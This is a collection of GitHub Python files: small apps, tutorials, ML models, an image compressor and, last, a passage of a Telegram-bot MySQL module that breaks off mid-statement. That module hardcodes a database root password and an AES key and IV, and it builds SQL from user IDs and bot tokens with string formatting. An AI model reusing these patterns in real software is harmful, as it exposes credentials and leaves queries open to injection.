+{"seq_id":"10012430267","text":"def app(environ, start_response):\n \"\"\"Simplest possible application object\"\"\"\n data = environ['QUERY_STRING'].split('&')\n data = [item+'\\r\\n' for item in data]\n data = [item.encode() for item in data]\n status = '200 OK'\n response_headers = [\n ('Content-type','text/plain'),\n ]\n start_response(status, response_headers)\n return iter(data)\n","repo_name":"KostiganSavin/stepic-web","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12362960434","text":"# noqa: D205,D400\n\"\"\"\nData checks\n===========\n\nUtilities designed to check the validity of data inputs.\n\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Sequence\n\nimport xarray as xr\n\nfrom .calendar import compare_offsets, parse_offset\nfrom .options import datacheck\nfrom .utils import ValidationError\n\n\n@datacheck\ndef check_freq(var: xr.DataArray, freq: str | Sequence[str], strict: bool = True):\n \"\"\"Raise an error if not series has not the expected temporal frequency or is not monotonically increasing.\n\n Parameters\n ----------\n var : xr.DataArray\n Input array.\n freq : str or sequence of str\n The expected temporal frequencies, using Pandas frequency terminology ({'A', 'M', 'D', 'H', 'T', 'S', 'L', 'U'})\n and multiples thereof. To test strictly for 'W', pass '7D' with `strict=True`.\n This ignores the start flag and the anchor (ex: 'AS-JUL' will validate against 'Y').\n strict : bool\n Whether multiples of the frequencies are considered invalid or not. With `strict` set to False, a '3H' series\n will not raise an error if freq is set to 'H'.\n \"\"\"\n if isinstance(freq, str):\n freq = [freq]\n exp_base = [parse_offset(frq)[1] for frq in freq]\n v_freq = xr.infer_freq(var.time)\n if v_freq is None:\n raise ValidationError(\n \"Unable to infer the frequency of the time series. \"\n \"To mute this, set xclim's option data_validation='log'.\"\n )\n v_base = parse_offset(v_freq)[1]\n if v_base not in exp_base or (\n strict and all(compare_offsets(v_freq, \"!=\", frq) for frq in freq)\n ):\n raise ValidationError(\n f\"Frequency of time series not {'strictly' if strict else ''} in {freq}. \"\n \"To mute this, set xclim's option data_validation='log'.\"\n )\n\n\ndef check_daily(var: xr.DataArray):\n \"\"\"Raise an error if not series has a frequency other that daily, or is not monotonically increasing.\n\n Notes\n -----\n This does not check for gaps in series.\n \"\"\"\n return check_freq(var, \"D\")\n","repo_name":"dougiesquire/xclim","sub_path":"xclim/core/datachecks.py","file_name":"datachecks.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"70101000009","text":"\"\"\" Day 14: Reindeer Olympics\n\nAuthor: Ic4r0 - https://github.com/Ic4r0\n\nCreated: 10th December 2021\n\"\"\"\n\n# imports\nfrom utils.parse_input import parse_by_line\nfrom re import match\n\n\n# modules\ndef compute_space(reindeer: dict, max_time: int) -> int:\n \"\"\" Compute traveled distance of a single reindeer\n\n :param reindeer: dict containing info about reindeer\n :param max_time: observation period\n :return: numeric result\n \"\"\"\n distance = 0\n time = 0\n while time < max_time:\n if time + reindeer['time'] > max_time:\n distance += (max_time - time) * reindeer['speed']\n else:\n distance += reindeer['time'] * reindeer['speed']\n time += reindeer['time'] + reindeer['rest']\n return distance\n\n\ndef part_1(reindeer: dict, is_test: bool) -> int:\n \"\"\" Code for the 1st part of the 14th day of Advent of Code\n\n :param reindeer: dict containing info about reindeer\n :param is_test: flag to use test max_time\n :return: numeric result\n \"\"\"\n max_time = 1000 if is_test else 2503\n distances = []\n for single_reindeer in reindeer.keys():\n distances.append(compute_space(reindeer[single_reindeer], max_time))\n return max(distances)\n\n\ndef part_2(reindeer: dict, is_test: bool) -> int:\n \"\"\" Code for the 2nd part of the 14th day of Advent of Code\n\n :param reindeer: dict containing info about reindeer\n :param is_test: flag to use test max_time\n :return: numeric result\n \"\"\"\n max_time = 1000 if is_test else 2503\n reindeer_list = reindeer.keys()\n points = {single_reindeer: 0 for single_reindeer in reindeer_list}\n for second in range(1, max_time):\n results_by_seconds = []\n for single_reindeer in reindeer_list:\n results_by_seconds.append(compute_space(reindeer[single_reindeer], second))\n max_values_names = [\n list(reindeer_list)[idx] for idx, result in enumerate(results_by_seconds)\n if result == max(results_by_seconds)\n ]\n for name in max_values_names:\n points[name] += 1\n\n return max(points.values())\n\n\ndef day_14(selected_part: int = None, test: bool = False):\n \"\"\" Needed to select which part of the 14th day we want to execute\n\n :param selected_part: selected Advent of Code part of the 14th day\n :param test: flag to use test input\n \"\"\"\n input_list = parse_by_line(14, int_list=False, is_test=test)\n reindeer = dict()\n for line in input_list:\n matches = match(r'(\\w+) can fly (\\d+) km/s for (\\d+) seconds, but then must rest for (\\d+) seconds.', line)\n name, speed, time, rest = matches.groups()\n reindeer[name] = {\n 'speed': int(speed),\n 'time': int(time),\n 'rest': int(rest),\n }\n\n if selected_part == 1 or not selected_part:\n result_part_1 = part_1(reindeer, is_test=test)\n print('The result of 1st part of the 14th day of AoC is: ' + str(result_part_1))\n if selected_part == 2 or not selected_part:\n result_part_2 = part_2(reindeer, is_test=test)\n print('The result of 2nd part of the 14th day of AoC is: ' + str(result_part_2))\n","repo_name":"Ic4r0/advent_of_code2015","sub_path":"days/day_14.py","file_name":"day_14.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70545685449","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.parameter import Parameter\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\n\n\nclass GraphAttentionLayer(nn.Module):\n\n def __init__(self, requires_grad=True):\n super(GraphAttentionLayer, self).__init__()\n if requires_grad:\n # unifrom initialization\n self.beta = Parameter(torch.Tensor(1).uniform_(\n 0, 1), requires_grad=requires_grad)\n else:\n self.beta = Variable(torch.zeros(1), requires_grad=requires_grad)\n\n def forward(self, x, adj, aff_cropping):\n\n norm2 = torch.norm(x, 2, 1).view(-1, 1)\n cos = torch.div(torch.mm(x, x.t()), torch.mm(norm2, norm2.t()) + 1e-7)\n\n mask = torch.zeros_like(aff_cropping).cuda()\n mask[aff_cropping == 0] = -1e9\n mask[cos<0] = -1e9\n cos = self.beta.cuda() * cos\n masked = cos + mask + 10 * adj\n\n # propagation matrix\n P = F.softmax(masked, dim=1)\n\n # attention-guided propagation\n output = torch.mm(P, x)\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (16 -> 16)'\n\n\nclass LinearLayer(nn.Module):\n\n def __init__(self, in_features, out_features, initializer=nn.init.xavier_uniform_):\n super(LinearLayer, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(initializer(\n torch.Tensor(in_features, out_features)))\n\n def forward(self, input):\n # no bias\n return torch.mm(input, self.weight)\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n\n\nclass A2GNN(nn.Module):\n\n def __init__(self, nfeat, nhid, nclass, nlayers, dropout_rate):\n super(A2GNN, self).__init__()\n\n self.layers = nlayers\n self.dropout_rate = dropout_rate\n\n self.embeddinglayer = LinearLayer(nfeat, nhid)\n nn.init.xavier_uniform_(self.embeddinglayer.weight)\n\n self.attentionlayers = nn.ModuleList()\n # for Cora dataset, the first propagation layer is non-trainable\n # and beta is fixed at 0\n self.attentionlayers.append(GraphAttentionLayer(requires_grad=True))\n for i in range(1, self.layers):\n self.attentionlayers.append(GraphAttentionLayer())\n\n self.outputlayer = LinearLayer(nhid, nclass)\n nn.init.xavier_uniform_(self.outputlayer.weight)\n\n def forward(self, x, adj, aff_cropping):\n x = F.relu(self.embeddinglayer(x))\n x = F.dropout(x, self.dropout_rate, training=self.training)\n\n for i in range(self.layers):\n x = self.attentionlayers[i](x, adj, aff_cropping)\n fts = x.clone()\n\n x = self.outputlayer(x)\n\n return x,fts\n","repo_name":"zbf1991/A2GNN","sub_path":"pygcn/A2GNN.py","file_name":"A2GNN.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"16"}
+{"seq_id":"39737261139","text":"#!/usr/bin/python\n# encoding: utf-8\n\n\"\"\"\n@author: Ian\n@contact:yongguiluo@hotmail.com\n@file: bilstm_seq2seq.py\n@time: 2019/3/11 17:02\n\"\"\"\nimport re\nimport numpy as np\nimport pandas as pd\nfrom mayiutils.file_io.pickle_wrapper import PickleWrapper as picklew\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Dense, Embedding, LSTM, TimeDistributed, Input, Bidirectional\nfrom tensorflow.keras.models import Model, load_model\n\n\ndef clean(s): #整理一下数据,有些不规范的地方\n if '“/s' not in s:\n return s.replace(' ”/s', '')\n elif '”/s' not in s:\n return s.replace('“/s ', '')\n elif '‘/s' not in s:\n return s.replace(' ’/s', '')\n elif '’/s' not in s:\n return s.replace('‘/s ', '')\n else:\n return s\n\n\ndef get_xy(s):\n \"\"\"\n 获取word序列和label序列\n\n :param s:\n :return:\n (['“', '人', '们', '常', '说', '生', '活', '是', '一', '部', '教', '科', '书'],\n ['s', 'b', 'e', 's', 's', 'b', 'e', 's', 's', 's', 'b', 'm', 'e'])\n \"\"\"\n s = re.findall('(.)/(.)', s)\n # print(s)\n if s:\n s = np.array(s)\n return list(s[:, 0]), list(s[:, 1])\n\n\ndef trans_one(x):\n \"\"\"\n 把label ['s', 'b'...]转换为one-hot形式\n :param x:\n :return:\n \"\"\"\n _ = map(lambda y: tf.keras.utils.to_categorical(y,5), tag[x].values.reshape((-1,1)))\n _ = list(_)\n _.extend([np.array([[0,0,0,0,1]])]*(maxlen-len(x)))\n return np.array(_)\n#转移概率,单纯用了等概率\nzy = {'be':0.5,\n 'bm':0.5,\n 'eb':0.5,\n 'es':0.5,\n 'me':0.5,\n 'mm':0.5,\n 'sb':0.5,\n 'ss':0.5\n }\n\nzy = {i:np.log(zy[i]) for i in zy.keys()}\n\n\ndef viterbi(nodes):\n paths = {'b': nodes[0]['b'], 's': nodes[0]['s']}\n for l in range(1,len(nodes)):\n paths_ = paths.copy()\n paths = {}\n for i in nodes[l].keys():\n nows = {}\n for j in paths_.keys():\n if j[-1]+i in zy.keys():\n nows[j+i] = paths_[j]+nodes[l][i]+zy[j[-1]+i]\n k = np.argmax(list(nows.values()))\n paths[list(nows.keys())[k]] = list(nows.values())[k]\n return list(paths.keys())[np.argmax(paths.values())]\n\n\ndef simple_cut(s):\n if s:\n r = model.predict(np.array([list(chars[list(s)].fillna(0).astype(int))+[0]*(maxlen-len(s))]), verbose=False)[0][:len(s)]\n # print(type(r), r.shape, r[:2])\n # return\n r = np.log(r)\n nodes = [dict(zip(['s', 'b', 'm', 'e'], i[:4])) for i in r]\n t = viterbi(nodes)\n words = []\n for i in range(len(s)):\n if t[i] in ['s', 'b']:\n words.append(s[i])\n else:\n words[-1] += s[i]\n return words\n else:\n return []\n\n\nnot_cuts = re.compile(r'([\\da-zA-Z ]+)|[。,、?!.?,!]')\n\n\ndef cut_word(s):\n result = []\n j = 0\n for i in not_cuts.finditer(s):\n result.extend(simple_cut(s[j:i.start()]))\n result.append(s[i.start():i.end()])\n j = i.end()\n result.extend(simple_cut(s[j:]))\n return result\n\n\nif __name__ == '__main__':\n mode = 2\n chars = picklew.loadFromFile('chars.pkl')\n maxlen = 32\n if mode == 2:\n model = load_model('model.h5')\n simple_cut('苏剑林是科学空间的博主')\n print(cut_word('苏剑林是科学空间的博主'))\n print(cut_word('你是真的遇到过报错了'))\n print(cut_word('列夫·托尔斯泰是俄罗斯一位著名的作家'))\n if mode == 1:\n \"\"\"\n train model\n \"\"\"\n s = open('msr_train.txt', encoding='gbk').read()\n s = s.split('\\r\\n')\n # print(s[0])\n s = ''.join(map(clean, s))\n s = re.split(r'[,。!?、]/[bems]', s)\n print(s[0])\n data = [] # 生成训练样本\n label = []\n for i in s:\n x = get_xy(i)\n if x:\n data.append(x[0])\n label.append(x[1])\n\n d = pd.DataFrame(index=range(len(data)))\n d['data'] = data\n d['label'] = label\n # print(d.head())\n \"\"\"\n 抛弃了多于32字的样本,这部分样本很少,事实上,用逗号、句号等天然分隔符分开后,句子很少有多于32字的。\n \"\"\"\n\n d = d[d['data'].apply(len) <= maxlen]\n d.index = range(len(d))\n 
\"\"\"\n    这次我用了5tag,在原来的4tag的基础上,加上了一个x标签,\n    用来表示不够32字的部分,比如句子是20字的,那么第21~32个标签均为x。\n    \"\"\"\n    tag = pd.Series({'s': 0, 'b': 1, 'm': 2, 'e': 3, 'x': 4})\n    chars = []  # 统计所有字,跟每个字编号\n    for i in data:\n        chars.extend(i)\n    # 按照词频出现的高低给word编号\n    chars = pd.Series(chars).value_counts().sort_values(ascending=False)\n    chars[:] = range(1, len(chars) + 1)\n    picklew.dump2File(chars, 'chars.pkl')\n    # # 生成适合模型输入的格式\n    # d['x'] = d['data'].apply(lambda x: np.array(list(chars[x]) + [0] * (maxlen - len(x))))\n    #\n    # d['y'] = d['label'].apply(trans_one)\n\n    # picklew.dump2File(d, 'd.pkl')\n    d = picklew.loadFromFile('d.pkl')\n    # 设计模型\n    word_size = 128\n    maxlen = 32\n\n    sequence = Input(shape=(maxlen,), dtype='int32')\n    embedded = Embedding(len(chars) + 1, word_size, input_length=maxlen, mask_zero=True)(sequence)\n    blstm = Bidirectional(LSTM(64, return_sequences=True), merge_mode='sum')(embedded)\n    output = TimeDistributed(Dense(5, activation='softmax'))(blstm)\n    model = Model(inputs=sequence, outputs=output)\n    model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n    print(model.summary())\n    \"\"\"\n    _________________________________________________________________\n    Layer (type)                 Output Shape              Param #   \n    =================================================================\n    input_1 (InputLayer)         (None, 32)                0         \n    _________________________________________________________________\n    embedding (Embedding)        (None, 32, 128)           660864    \n    _________________________________________________________________\n    bidirectional (Bidirectional (None, 32, 64)            98816     \n    _________________________________________________________________\n    time_distributed (TimeDistri (None, 32, 5)             325       \n    =================================================================\n    Total params: 760,005\n    Trainable params: 760,005\n    Non-trainable params: 0\n    _________________________________________________________________\n    None\n    \"\"\"\n    batch_size = 1024\n    history = model.fit(np.array(list(d['x'])), np.array(list(d['y'])).reshape((-1, maxlen, 5)), batch_size=batch_size,\n                        nb_epoch=50)\n    model.save('model.h5')\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mayi140611/mayiutils","sub_path":"apps/lstmtest/bilstm_seq2seq.py","file_name":"bilstm_seq2seq.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70253672008","text":"#!/usr/bin/python3\n\"\"\"a module with a prime number game\"\"\"\n\n\ndef is_prime(num):\n    \"\"\"checks if the number is prime\"\"\"\n    if num <= 1:\n        return False\n    if num <= 3:\n        return True\n    if num % 2 == 0 or num % 3 == 0:\n        return False\n    i = 5\n    while i * i <= num:\n        if num % i == 0 or num % (i + 2) == 0:\n            return False\n        i += 6\n    return True\n\n\ndef isWinner(x, nums):\n    \"\"\"determines the winner\"\"\"\n    maria_wins = 0\n    ben_wins = 0\n\n    for n in nums:\n        # Count the number of prime numbers in the range [1, n]\n        prime_count = sum(1 for i in range(1, n + 1) if is_prime(i))\n\n        # If the number of prime numbers is odd, Maria wins\n        # If the number of prime numbers is even, Ben wins\n        if prime_count % 2 == 1:\n            maria_wins += 1\n        else:\n            ben_wins += 1\n\n    if maria_wins > ben_wins:\n        return \"Maria\"\n    elif ben_wins > maria_wins:\n        return \"Ben\"\n    else:\n        return None\n","repo_name":"Mmah-Zombo/alx-interview","sub_path":"0x0A-primegame/0-prime_game.py","file_name":"0-prime_game.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2478278175","text":"import json\r\nimport os\r\nfrom PIL import Image\r\n\r\n#loading data from config.json\r\nwith open(\"config.json\", \"r\") as f:\r\n config = json.load(f)\r\n\r\nprint(config['new_size_ratio'])\r\n\r\n\r\ndef get_size_format(b, factor=1024, suffix=\"B\"):\r\n \"\"\"\r\n Scale bytes to its proper byte format\r\n e.g:\r\n 1253656 => '1.20MB'\r\n 1253656678 => '1.17GB'\r\n \"\"\"\r\n for unit in [\"\", \"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\"]:\r\n if b < factor:\r\n return f\"{b:.2f}{unit}{suffix}\"\r\n b /= factor\r\n return f\"{b:.2f}Y{suffix}\"\r\n\r\n\r\ndef compress_img(image_name, new_size_ratio=config['new_size_ratio'], quality=config['quality'], width=config['width'], height=config['height'], to_jpg=True):\r\n print(new_size_ratio,quality,width,height)\r\n # load the image to memory\r\n img = Image.open(image_name)\r\n # print the original image shape\r\n print(\"[*] Image shape:\", img.size)\r\n # get the original image size in bytes\r\n image_size = os.path.getsize(image_name)\r\n # print the size before compression/resizing\r\n print(\"[*] Size before compression:\", get_size_format(image_size))\r\n if new_size_ratio == 1.0:\r\n # if resizing ratio is below 1.0, then multiply width & height with this ratio to reduce image size\r\n img = img.resize((int(img.size[0] * new_size_ratio), int(img.size[1] * new_size_ratio)), Image.ANTIALIAS)\r\n # print new image shape\r\n print(\"[+] New Image shape:\", img.size)\r\n elif width and height:\r\n # if width and height are set, resize with them instead\r\n img = img.resize((width, height), Image.ANTIALIAS)\r\n # print new image shape\r\n print(\"[+] New Image shape:\", img.size)\r\n # split the filename and extension\r\n filename, ext = os.path.splitext(image_name)\r\n # make new filename appending _compressed to the original file name\r\n\r\n new_filename ='a_compress.jpg' \r\n a=config['output_file_image'] + new_filename\r\n # save the image with the corresponding quality and optimize set to True\r\n img.save(f\"{config['output_file_image']}/a.jpg\", quality=quality, optimize=True)\r\n print(\"[+] New file saved:\", new_filename)\r\n# calling the function\r\ncompress_img(config['input_file_image'])","repo_name":"sumit-iot/video_and_image_compression","sub_path":"Compress_image.py","file_name":"Compress_image.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32492983534","text":"# The OpenStack Way\nfrom oslo import messaging\nfrom oslo.config import cfg\n\nTRANSPORT = None\nNOTIFIER = None\n\ndef init(conf):\n\tglobal TRANSPORT, NOTIFIER\n\tTRANSPORT = messaging.get_transport(conf)\n\tdriver = 'messaging'\n\tNOTIFIER = messaging.Notifier(TRANSPORT, driver=driver)\n\ndef get_client(topic):\n\tassert TRANSPORT is not None\n\ttarget = messaging.Target(topic=topic)\n\treturn messaging.RPCClient(TRANSPORT, target)\n\n\ndef get_server(topic, endpoints):\n\tassert TRANSPORT is not None\n\tassert type(endpoints) is list\n\tcfg.CONF.import_opt('host', 'sim.nova.compute')\n\ttarget = messaging.Target(topic=topic, server=cfg.CONF.host)\n\treturn messaging.get_rpc_server(TRANSPORT, target, endpoints)\n\ndef get_notifier(publisher_id):\n\t\tassert NOTIFIER is not None\n\t\treturn NOTIFIER.prepare(publisher_id=publisher_id)\n","repo_name":"affear/smart_alloc_simulator","sub_path":"sim/nova/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"8461174519","text":"# P183\n# 变量作用域:变量生效的范围,主要分为 局部变量 和 全局变量\ndef testA():\n a = 100\n print(a) # 函数内部访问,则可以访问变量 a\n\ntestA() # 100\n# print(a)\n\n# NameError: name 'a' is not defined\n# a 是一个局部变量不能全局生效,故显示a没有被定义\n\nx = 10\ndef f():\n x = 5\n print('f内部: x=', x)\n return x * x\n\nprint('f()=', f())\n# f内部: x= 5 # 局部变量和全局变量同名时,局部变量屏蔽全局变量,简称“局部优先”\n# f()= 25 # 若 x = 5 不存在,则 x 可以访问外部变量此时 x = 10,局部变量可以访问全局变量,全局变量不可以访问局部变量\nprint('f外部: x=', x) \n# f外部: x= 10\n\n# 如何在将局部变量变为全局变量?修改局部变量为全局变量\n'''\n语法: \nglobal 变量\n变量 = 数值'''\na = 100\ndef testA():\n global a # global 将 a 定义为了全局变量,位置位于 a = 100 下面,所以 a 的值新定义为了 200\n a = 200\n print(a)\n\nprint(a)\n# 100 \ntestA()\n# 200\nprint(a)\n# 200\n\n# 返回值作为参数传递\ndef test1():\n return 50\n\ndef test2(num):\n print(num)\n\nresult = test1()\ntest2(result)\n# 50","repo_name":"luguodezhangsan/VsCode_Python","sub_path":"050-函数变量作用域.py","file_name":"050-函数变量作用域.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"14764925989","text":"from tkinter import *\n\n\ndef qwer():\n user_inp = user.get()\n if user_inp == '1':\n text_win.insert(0.1, f'{type(user_inp)} - 1\\n')\n elif user_inp == '2':\n text_win.insert(0.0, f'{type(user_inp)} - 2\\n')\n else:\n text_win.insert(0.0, f'Вы ввели текст {type(user_inp)}\\n')\n\n\n\nwin = Tk()\nwin.geometry('500x500')\n\nuser = Entry(win)\nuser.pack()\n\nbtn = Button(win, text='проверить', command=qwer)\nbtn.pack()\n\nglobal text_win\ntext_win = Text(win)\ntext_win.pack()\n\nwin.mainloop()","repo_name":"FrodoB-Shire/programm_for_img","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"14321288413","text":"n=int(input(\"enter which term you want to get?:-\"))\nsum=0\nk=1\nd=2\na=3\nfor i in range(1,n):\n\tprint(k,',',end='')\n\tk+=a\n\ta+=d\nprint(f'\\n{n}th term=',k)","repo_name":"Sur818/Coding-Projects","sub_path":"python programming/forloop97_nth term.py","file_name":"forloop97_nth term.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37065598864","text":"import asyncio\nimport aiomysql\n\nfrom .MessageTexts import *\nfrom ..secound.secound_constants import *\nfrom ..secound.Seller.const4seller import *\nfrom ..secound.Seller.constdb4dbseller import *\n\nasync def db4takjoy(flag_Update_Token, **kwargs):\n pre_secure = \"\"\"SET block_encryption_mode = 'aes-256-cbc'; \n SET @key_str = SHA2('My secret passphrase',512);\n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \"\"\" \n db2mem_citypost = (\"\"\"select AES_DECRYPT(`city_name`,@key_str, @init_vector), AES_DECRYPT(`post_purchase`,@key_str, @init_vector) from {table4citypost};\"\"\")\n createtable4citypost = (\"\"\"CREATE TABLE IF NOT EXISTS {table4citypost}(\n `citypost_no` int(12) NOT NULL AUTO_INCREMENT,\n `city_name` Text not NULL,\n `post_purchase` Text not NULL,\n PRIMARY KEY(citypost_no));\"\"\")\n select4customer = (\"\"\"select AES_DECRYPT(user_id,@key_str, @init_vector),\n AES_DECRYPT(user_name,@key_str, @init_vector),\n AES_DECRYPT(first_name,@key_str, @init_vector),\n AES_DECRYPT(last_name,@key_str, @init_vector),\n AES_DECRYPT(Address,@key_str, @init_vector),\n AES_DECRYPT(Phone_Number,@key_str, @init_vector)\n from {table4customer};\"\"\")\n create_customer_table = (\"\"\"CREATE TABLE IF NOT EXISTS {table4customer}(\n `emp_nu` int(12) NOT NULL AUTO_INCREMENT,\n `user_id` Text NULL,\n `user_name` Text NULL,\n `first_name` Text NULL,\n `last_name` Text NULL,\n `Address` Text NULL,\n `Phone_Number` Text NULL,\n `city_dict` Text NULL,\n `Postal_code` Text NULL,\n PRIMARY KEY(emp_nu));\"\"\")\n update_token = (\"\"\"SET block_encryption_mode = 'aes-256-cbc';\n SET @key_str = SHA2('My secret passphrase',512); \n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~';\n SET @ENCRYPT_Bot_id = '{Bot_id}';\n SET @ENCRYPT_Token = '{Token}';\n UPDATE Token_Takjoy set `Token` = AES_ENCRYPT(@ENCRYPT_Token, @key_str, @init_vector) where `Bot_id` = AES_ENCRYPT(@ENCRYPT_Bot_id, @key_str, @init_vector);\"\"\")\n\n loop = asyncio.get_event_loop()\n conn = await aiomysql.connect(host='127.0.0.1', port=3306, \n user='root', password=\"lk1l,tr3ldal5\",charset = \"utf8\",\n db='Test', loop=loop)\n\n cur = await conn.cursor()\n async with conn.cursor() as cur: \n await cur.execute(sql)\n await conn.commit()\n if flag_Update_Token == 0:\n cur = await conn.cursor()\n insert_table = (\"\"\"SET block_encryption_mode = 'aes-256-cbc';\n SET @key_str = SHA2('My secret passphrase',512); \n SET @init_vector = 'h>1&cr!a[v+qm&3b+F6*P~'; \n SET @ENCRYPT_User_id = '{User_id}'; \n SET @ENCRYPT_Bot_id = '{Bot_id}'; \n SET @ENCRYPT_Token = '{Token}'; \n INSERT IGNORE INTO Token_Takjoy(User_id, Token, Bot_Date, Bot_ID) \n VALUES(AES_ENCRYPT(@ENCRYPT_User_id,@key_str, @init_vector), \n AES_ENCRYPT(@ENCRYPT_Token,@key_str, @init_vector), \n (CURDATE() + interval {Daysetting} day), \n AES_ENCRYPT(@ENCRYPT_Bot_id,@key_str, @init_vector));\"\"\")\n \n len_flag = len(saveindb)\n for i in range(0,len_flag):\n my_user_id = saveindb.pop()\n await cur.execute(insert_table.format(User_id = str(my_user_id),\n Token = true_token[my_user_id], \n Bot_id = kwargs[\"Bot_id\"], \n Daysetting = int(kwargs[\"Daysetting\"])))\n await conn.commit() \n\n elif flag_Update_Token == 1: \n await cur.execute(befor_select_all)\n await conn.commit()\n await cur.execute(select_all)\n await conn.commit()\n result_db = await cur.fetchall()\n await cur.execute(select4botmaker)\n await conn.commit()\n curbing_repeat_bot = await cur.fetchall()\n for row in curbing_repeat_bot:\n if row[0] and row[1]:\n 
dic_bot_user_id[row[0].decode('utf8')] = row[1].decode('utf8')\n dic_user_id_bot[row[1].decode('utf8')] = row[0].decode('utf8')\n if row[1].decode('utf8') not in list_bot_id:\n list_bot_id.append(row[1].decode('utf8'))\n await cur.execute(select4chargebot)\n await conn.commit()\n db2mem4charge_bot = await cur.fetchall()\n for row in db2mem4charge_bot:\n if row[1] and row[0]:\n dic4charge_bot_id2token[row[1].decode('utf8')] = row[0].decode('utf8')\n\n for row in result_db:\n if row[1]:\n row1 = row[1].decode('utf8')\n row2 = row[2].decode('utf8')\n temp_bot_un = row[4].decode('utf8')\n temp_bot_date = row[3]\n if row1:\n if row1 not in dict4bot_ids4users:\n dict4bot_ids4users[row1] = []\n if temp_bot_un not in dict4bot_ids4users[row1]:\n dict4bot_ids4users[row1].append(temp_bot_un)\n\n Date_bot[temp_bot_un] = temp_bot_date\n user_id4owner[row2] = str(row1) + row2\n UNT_Dict[row[0]] = [row1, row2, temp_bot_date]\n await cur.execute(createtable4seller.format(table4seller = row[0]))\n await cur.execute(select_all_seller.format(table4seller = row[0]))\n await conn.commit()\n result_sellers = await cur.fetchall()\n seller_dict[row1 + row2] = []\n for seller_row in result_sellers:\n seller_row1 = seller_row0 = None\n if seller_row[1]:\n seller_row1 = seller_row[1].decode('utf8')\n if seller_row[0]:\n seller_row0 = seller_row[0].decode('utf8')\n seller_dict[row1 + row2].append([seller_row1, seller_row0])\n table4citypost = \"post4city_\" + str(row[0])\n await cur.execute(createtable4citypost.format(table4citypost = table4citypost))\n await conn.commit()\n await cur.execute(db2mem_citypost.format(table4citypost = table4citypost))\n await conn.commit()\n citypost_iter = await cur.fetchall()\n for citypost in citypost_iter:\n if citypost[0] and citypost[1]:\n citypost_0 = citypost[0].decode('utf8') \n citypost_1 = citypost[1].decode('utf8')\n if row[0] not in dict_citypost:\n dict_citypost[row[0]] = []\n dict_citypost[row[0]].append([citypost_0, citypost_1])\n table4customer = \"sec_customer_\" + str(row[0])\n await cur.execute(create_customer_table.format(table4customer = table4customer))\n await conn.commit()\n await cur.execute(select4customer.format(table4customer = table4customer))\n await conn.commit()\n iter4customer_chars = await cur.fetchall()\n for customer_chars in iter4customer_chars:\n if row[0] not in dic_user_id:\n dic_user_id[row[0]] = []\n dic_user_id[row[0]].append(customer_chars[0].decode('utf8'))\n for index in range(1, len(customer_chars)-1):\n if customer_chars[index]:\n list4customer_chars[index-1][customer_chars[0].decode('utf8') + row2] = customer_chars[index].decode('utf8')\n dict_token2e_num[row2] = row[0]\n else:\n return True\n\n elif flag_Update_Token == 2:\n for U_id in changeindb:\n Temp_Exchange_Token = save_new_token[U_id]\n Exchange_Token = (U_id, Temp_Exchange_Token[1])\n await cur.execute(Update_Token, Exchange_Token)\n await conn.commit()\n\n elif flag_Update_Token == 3:\n create_table_seller = \"sec_sell_\" + str(kwargs[\"table_name\"])\n temp_key = kwargs[\"key_acc\"]\n table_seller = (dic_first_button.get(temp_key),\n dic_secound_button.get(temp_key),\n dic_title.get(temp_key),\n dic_context.get(temp_key),\n dic_price_ware.get(temp_key),\n dic_currency_ware.get(temp_key),\n dic_unit_ware.get(temp_key),\n dic_discount.get(temp_key),\n dic_photo_file.get(temp_key),\n file_id.get(temp_key),\n day_code.get(temp_key))\n\n create_other_table = (\"CREATE TABLE IF NOT EXISTS \" + create_table_seller + \" (\"\n \"`emp_nu` int(12) NOT NULL AUTO_INCREMENT,\"\n 
